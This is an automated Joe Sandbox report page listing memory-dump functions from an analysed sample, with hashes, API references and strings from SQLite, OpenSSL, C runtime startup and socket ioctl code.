Opcode ID: 84563e68994f67bd0359b5aad2f3d3f2950558a3e2c875124d3c7227c03bf596
Instruction ID: c045a48526a8f1150b2f4f62f73a1872f2d74509ba55fbef9aea07ca294e9e98
Opcode Fuzzy Hash: 84563e68994f67bd0359b5aad2f3d3f2950558a3e2c875124d3c7227c03bf596
Instruction Fuzzy Hash: D9519121A0A71283FA149B2AE84217563A1FF84FD1F046535DF0E8B7A4EF7CE457870A

Function 00007FF8A884A080 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 384COMMON

Download Yara Rule

Strings

sqlite3_, xrefs: 00007FF8A884A273
no entry point [%s] in shared library [%s], xrefs: 00007FF8A884A50C
lib, xrefs: 00007FF8A884A2C1
_init, xrefs: 00007FF8A884A36E
error during initialization: %s, xrefs: 00007FF8A884A436
not authorized, xrefs: 00007FF8A884A0E8
sqlite3_extension_init, xrefs: 00007FF8A884A0FF
unable to open shared library [%.*s], xrefs: 00007FF8A884A67F
%s.%s, xrefs: 00007FF8A884A13C

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID:
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
API String ID: 0-3733955532
Opcode ID: e4b0916d667a71359ec97e8b99ef36efb7173e4a05d1a8fbbc39af4a0ae51360
Instruction ID: 0512856bf21ebf4bced5afb93784c11edb25656e399322a1cf937bb874fbe2eb
Opcode Fuzzy Hash: e4b0916d667a71359ec97e8b99ef36efb7173e4a05d1a8fbbc39af4a0ae51360
Instruction Fuzzy Hash: DD02B362B0BB82A1EF258B11A458779B3A0FF55BC5F484135DE4E4A791EF3CE484C728

Function 00007FF8A92D1A23 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

00007FF8A82A4D18.LIBCRYPTO-3 ref: 00007FF8A9313497
00007FF8A82A4D18.LIBCRYPTO-3 ref: 00007FF8A93134C7
00007FF8A82A4D18.LIBCRYPTO-3 ref: 00007FF8A93134F5
00007FF8A82A4D18.LIBCRYPTO-3 ref: 00007FF8A9313516
00007FF8A82A4D18.LIBCRYPTO-3 ref: 00007FF8A9313537
00007FF8A82A4D18.LIBCRYPTO-3 ref: 00007FF8A9313554
00007FF8A82A4D18.LIBCRYPTO-3 ref: 00007FF8A9313574
00007FF8A82A4D18.LIBCRYPTO-3 ref: 00007FF8A9313594

Strings

ssl_srp_ctx_init_intern, xrefs: 00007FF8A9313658
..\s\ssl\tls_srp.c, xrefs: 00007FF8A93135E9, 00007FF8A9313629, 00007FF8A9313662, 00007FF8A931367F, 00007FF8A9313698

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
API String ID: 3568877910-1794268454
Opcode ID: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
Instruction ID: 26989711c2c086098bee66880bc695f3be4ce4509605d1cf4b4c46be75d0bf9d
Opcode Fuzzy Hash: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
Instruction Fuzzy Hash: 5FA14A26A0FFC2A1EA85DF25D4507B873B4FB84B88F296135DE5D87365EF28E1918310

Function 00007FF8A8182730 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8A8182758
__scrt_initialize_crt.LIBCMT ref: 00007FF8A818279D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8A81827AA
_RTC_Initialize.LIBCMT ref: 00007FF8A81827D8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8A81827FE
__scrt_release_startup_lock.LIBCMT ref: 00007FF8A8182829

Memory Dump Source

Source File: 00000001.00000002.2480153841.00007FF8A8181000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8180000, based on PE: true

Associated: 00000001.00000002.2480032989.00007FF8A8180000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A81E2000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A822E000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8231000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8236000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8290000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8293000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8295000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8298000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2481039753.00007FF8A8299000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2481081086.00007FF8A829B000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a8180000_Resource.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
Instruction ID: 409dab929152d931dcbe7a91beab42dff0214f4e877f643f193cbf0843b90130
Opcode Fuzzy Hash: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
Instruction Fuzzy Hash: E181E221E0E643A6FA679B6694432B922D1EF657C0F544035ED0C43796DF7CE845C728

Function 00007FF8B7DF3D20 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8B7DF3D48
__scrt_initialize_crt.LIBCMT ref: 00007FF8B7DF3D8D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8B7DF3D9A
_RTC_Initialize.LIBCMT ref: 00007FF8B7DF3DC8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8B7DF3DEE
__scrt_release_startup_lock.LIBCMT ref: 00007FF8B7DF3E19

Memory Dump Source

Source File: 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8B7DF0000, based on PE: true

Associated: 00000001.00000002.2485076175.00007FF8B7DF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485119166.00007FF8B7DFE000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485119166.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485250154.00007FF8B7E02000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7df0000_Resource.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: d3ddbefa302e51346800ae9c45ea9f4eca718aabf48d1b671359c6f83f27e57c
Instruction ID: 3e52df7851454f43f6486b84bc9fd9c0cccafc159c1caf6a83fb64f0c62ae829
Opcode Fuzzy Hash: d3ddbefa302e51346800ae9c45ea9f4eca718aabf48d1b671359c6f83f27e57c
Instruction Fuzzy Hash: D9815B21E0874346FA50AB6DA8812BD66A0AF85BC4F4D4335DB4D4F7BEDF3CE9568600

Function 00007FF8B7E522A0 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8B7E522C8
__scrt_initialize_crt.LIBCMT ref: 00007FF8B7E5230D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8B7E5231A
_RTC_Initialize.LIBCMT ref: 00007FF8B7E52348
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8B7E5236E
__scrt_release_startup_lock.LIBCMT ref: 00007FF8B7E52399

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 9bbd730a66e4cbb51c460212e6bb78fa7447f27bb902fb331a2f3e6d0f89718b
Instruction ID: 48a4db575de4c30bec0f9ea620a7308aaeb72ef5f90a1a40dcf1fff653c459ee
Opcode Fuzzy Hash: 9bbd730a66e4cbb51c460212e6bb78fa7447f27bb902fb331a2f3e6d0f89718b
Instruction Fuzzy Hash: 768179E1E0838B86FB50AB6D945127D2698AF85FC0F044035EB0C977B6DF3CFA428601

Function 00007FF8B7E1284C Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8B7E12874
__scrt_initialize_crt.LIBCMT ref: 00007FF8B7E128B9
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8B7E128C6
_RTC_Initialize.LIBCMT ref: 00007FF8B7E128F4
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8B7E1291A
__scrt_release_startup_lock.LIBCMT ref: 00007FF8B7E12945

Memory Dump Source

Source File: 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B7E10000, based on PE: true

Associated: 00000001.00000002.2485330634.00007FF8B7E10000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E30000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E39000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E3D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485534943.00007FF8B7E40000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e10000_Resource.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 8bc07dac1d2a15841653c24e65cbf90d53687740eca8f36c6e0f4d9ec23f2963
Instruction ID: 9ff4bad72aa9a150323e14e04c25aab154a4222fa0de994afaf619c5f13740c5
Opcode Fuzzy Hash: 8bc07dac1d2a15841653c24e65cbf90d53687740eca8f36c6e0f4d9ec23f2963
Instruction Fuzzy Hash: BB816A61F087434AFA949B6D984327F6298AF89FC0F144035DB4D97FB6DE2CEA428710

Function 00007FF8A8810670 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 487COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A881073C

Strings

cannot open view: %s, xrefs: 00007FF8A8810CCD
no such column: "%s", xrefs: 00007FF8A8810CB9
cannot open virtual table: %s, xrefs: 00007FF8A8810CDF
foreign key, xrefs: 00007FF8A8810913
cannot open table without rowid: %s, xrefs: 00007FF8A8810CD6
indexed, xrefs: 00007FF8A8810960
cannot open %s column for writing, xrefs: 00007FF8A8810C9B
out of memory, xrefs: 00007FF8A88107A8

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
API String ID: 3568877910-554953066
Opcode ID: b5142a65ad92802e7aebaf60e3e35232a45894e0ccd707b0d321319f1fbaaf7d
Instruction ID: c7dc381ce6ee947f6d39c869084fd0049962ad5a1949cfa2317d5ae795aa1464
Opcode Fuzzy Hash: b5142a65ad92802e7aebaf60e3e35232a45894e0ccd707b0d321319f1fbaaf7d
Instruction Fuzzy Hash: C032AC72F1AB81AAEB64CF25D8406B937A4FB48BC4F404276DA8D47795DF38E850CB14

Function 00007FF8A87DF9D0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON

Download Yara Rule

APIs

new[].MSPDB140-MSVCRT ref: 00007FF8A87DFAE7

Strings

:, xrefs: 00007FF8A87DFA01
winFullPathname1, xrefs: 00007FF8A87DFACC
?, xrefs: 00007FF8A87DFA11
winFullPathname2, xrefs: 00007FF8A87DFB55
:, xrefs: 00007FF8A87DFA3C
%s%c%s, xrefs: 00007FF8A87DFA46
\, xrefs: 00007FF8A87DFA58

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: new[]
String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
API String ID: 4059295235-3840279414
Opcode ID: 407565720c01e4f4dae024f18073d7389dd2ad845b77d27617bea5722536b943
Instruction ID: ca4935074c0623a3a6d7a8106dd3e348dc9b5522eb998ee1bad5ab25a276fe70
Opcode Fuzzy Hash: 407565720c01e4f4dae024f18073d7389dd2ad845b77d27617bea5722536b943
Instruction Fuzzy Hash: 6851F321E4E6C266FB159B21A4117BA6791EF85BC8F484036EE4D07786DF3CE8458F28

Function 00007FF8B8AF61BC Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 69COMMON

Download Yara Rule

APIs

00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6078
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6096
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF60B4
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF60D2

Strings

delete, xrefs: 00007FF8B8AF60AA
update, xrefs: 00007FF8B8AF608C
insert, xrefs: 00007FF8B8AF606E
replace, xrefs: 00007FF8B8AF60C8

Memory Dump Source

Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true

Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd

Similarity

API ID: 00007C6126
String ID: delete$insert$replace$update
API String ID: 1558781965-310407209
Opcode ID: 58a4f4814359b72ce499f0f0b978cfe0b0904b94eaf9a74cbe67c76c5f7c7bf0
Instruction ID: 6f037ae95324b3c9980ed20d116f8abebc2fc49b50285b0a367d7a31e1420a0e
Opcode Fuzzy Hash: 58a4f4814359b72ce499f0f0b978cfe0b0904b94eaf9a74cbe67c76c5f7c7bf0
Instruction Fuzzy Hash: E0217151A0A65242FB648F2DD81237A2792AF45FC1F44A035DB4DCB291DF2DD167C34E

Function 00007FF8B8AF6150 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52COMMON

Download Yara Rule

APIs

00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6078
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6096
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF60B4
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF60D2

Strings

delete, xrefs: 00007FF8B8AF60AA
update, xrefs: 00007FF8B8AF608C
insert, xrefs: 00007FF8B8AF606E
replace, xrefs: 00007FF8B8AF60C8

Memory Dump Source

Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true

Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd

Similarity

API ID: 00007C6126
String ID: delete$insert$replace$update
API String ID: 1558781965-310407209
Opcode ID: 42f66f61b617ee9252a283ff1b3c30e5260efa9f9c13c54a74dc873a66497ccb
Instruction ID: c8bc73dfe4405adeab0e7dc5c68e7c462cccc6dcc04616d310f4e6c115d109c1
Opcode Fuzzy Hash: 42f66f61b617ee9252a283ff1b3c30e5260efa9f9c13c54a74dc873a66497ccb
Instruction Fuzzy Hash: 99111F25B0A65283FA54CB1AE8423392295AF45FC0F44A435DF0DCB691EF2DE167C74E

Function 00007FF8A92D2545 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 206COMMON

Download Yara Rule

APIs

00007FF8C61A3420.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF8A92E2008
GetLastError.KERNEL32 ref: 00007FF8A92E2172

Strings

SSL_add_dir_cert_subjects_to_stack, xrefs: 00007FF8A92E215A, 00007FF8A92E2193, 00007FF8A92E221D
%s/%s, xrefs: 00007FF8A92E1FE8
SSL_add_file_cert_subjects_to_stack, xrefs: 00007FF8A92E21D0
..\s\ssl\ssl_cert.c, xrefs: 00007FF8A92E2166, 00007FF8A92E219F, 00007FF8A92E21DC, 00007FF8A92E2229
calling OPENSSL_dir_read(%s), xrefs: 00007FF8A92E217B

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007A3420ErrorLast
String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
API String ID: 3659664395-502574948
Opcode ID: d54ca19c4df7de8f89b3f3b0734e15455dee2d588e9c68f09e2164161568d0f8
Instruction ID: 7345cad3d571278f04232ff17b7caedcb894e581a66e2e929ef26e2ed57736a5
Opcode Fuzzy Hash: d54ca19c4df7de8f89b3f3b0734e15455dee2d588e9c68f09e2164161568d0f8
Instruction Fuzzy Hash: 64917551A0EAC265FA50AF15A8517FE66A0EFC57C1F416031EA5EC7B9ADF3CE501C700

Function 00007FF8B7E55414 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 113networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32 ref: 00007FF8B7E5550A
WSAIoctl.WS2_32 ref: 00007FF8B7E55579
WSAIoctl.WS2_32 ref: 00007FF8B7E555E6

Strings

invalid ioctl command %lu, xrefs: 00007FF8B7E5548E
kI:ioctl, xrefs: 00007FF8B7E554CC, 00007FF8B7E555A4
kO:ioctl, xrefs: 00007FF8B7E5544F
k(kkk):ioctl, xrefs: 00007FF8B7E55537

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: Ioctl
String ID: invalid ioctl command %lu$k(kkk):ioctl$kI:ioctl$kO:ioctl
API String ID: 3041054344-4238462244
Opcode ID: 55a07f998d6ae28afa997e7e159e656449db5a2412ae30cc886daef19bdfb253
Instruction ID: 1f4e5a6f57247533c6e74f6fee4b47644e49ce43c2ccd4bc395a65657739fb69
Opcode Fuzzy Hash: 55a07f998d6ae28afa997e7e159e656449db5a2412ae30cc886daef19bdfb253
Instruction Fuzzy Hash: 75515FB2A18B8699E750CF68E8405AD37B1FF48B98F544132EB4E93A68DF3CE554C740

Function 00007FF8A92D1497 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 306COMMON

Download Yara Rule

Strings

..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FF8A9328C9A, 00007FF8A9328EC5, 00007FF8A932904E, 00007FF8A93290CF, 00007FF8A932913E
SHA2-256, xrefs: 00007FF8A9328FD2
, xrefs: 00007FF8A9328F9E
HMAC, xrefs: 00007FF8A9328F86
tls_construct_stoc_cookie, xrefs: 00007FF8A9328C8E, 00007FF8A9328EB9, 00007FF8A9329047, 00007FF8A93290C3, 00007FF8A9329137

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID:
String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
API String ID: 0-1087561517
Opcode ID: d18fac02f8c16941b1c8b65281ccedea69a7ff46737656c446fcb388b997f323
Instruction ID: ead0aa2a9f34a8e4f9ee522bbab56783cc3dc0d1038c0b2f615b5f4fd38e7af6
Opcode Fuzzy Hash: d18fac02f8c16941b1c8b65281ccedea69a7ff46737656c446fcb388b997f323
Instruction Fuzzy Hash: 17D15A65B0EAC365FB54AE629A543F922B5EF957C4F046032DE0EC7B8ADE3DE4058310

Function 00007FF8A92D26F8 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 257COMMON

Download Yara Rule

Strings

SSL_CTX_use_serverinfo_file, xrefs: 00007FF8A92FA7E1, 00007FF8A92FA820, 00007FF8A92FA8E3, 00007FF8A92FAA55, 00007FF8A92FAA8B, 00007FF8A92FAAB4, 00007FF8A92FAADF, 00007FF8A92FAB03
